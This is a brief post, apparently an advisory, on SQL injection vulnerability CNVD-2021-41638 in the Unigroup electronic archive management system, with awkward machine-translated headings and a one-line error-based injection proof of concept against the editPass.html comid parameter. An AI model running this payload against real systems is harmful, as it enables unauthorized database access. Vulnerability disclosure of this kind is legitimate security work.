Post

Unigroup Archive Management System Editpass Html Sql Injection Vulnerability Cnvd 2021 41638

Unigroup Archive Management System Editpass Html Sql Injection Vulnerability Cnvd 2021 41638

Unigroup Archive Management System editPass.html SQL injection vulnerability CNVD-2021-41638

Vulnerability Description

There is a SQL injection vulnerability in the Unigroup Electronics Archive Management System.

Vulnerability Impact

Tianguang Electronic File Management System

Network surveying and mapping

Vulnerability reappears

Login page

img

Verify POC

1
/login/Login/editPass.html?comid=extractvalue(1,concat(char(126),md5(1)))

img

This post is licensed under CC BY 4.0 by the author.